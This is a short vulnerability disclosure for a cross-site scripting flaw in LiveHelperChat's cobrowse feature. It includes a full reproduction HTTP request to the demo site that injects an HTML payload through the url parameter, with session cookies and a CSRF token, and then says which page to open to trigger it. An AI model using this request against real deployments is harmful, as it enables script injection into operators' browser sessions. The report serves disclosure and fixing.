Description

LiveHelperChat is vulnerable to XSS in /cobrowse/checkmirrorchanges/ in it response the url parameter to json content while response content type is html.

**SETP1:
set the url in following request

POST /cobrowse/storenodemap/(hash)/1_74QXubVQ2cHdPR5xt5vNLBWVRnRwNu6MBWHoxRs3/?url=<img src> HTTP/1.1
Host: demo.livehelperchat.com
Cookie: lhc_vid=870cb399a6e325442af4; PHPSESSID=7cn9ufgv0vtk2fq4occksshj4q
Content-Length: 9
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="99"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-Csrftoken: 2b273ff9db24ba85229086357ed9e16f
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.livehelperchat.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.livehelperchat.com/site_admin/cobrowse/browse/2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

data=[{}]

**STEP2:
open the https://demo.livehelperchat.com/cobrowse/checkmirrorchanges/1/ with the corresponding chatid.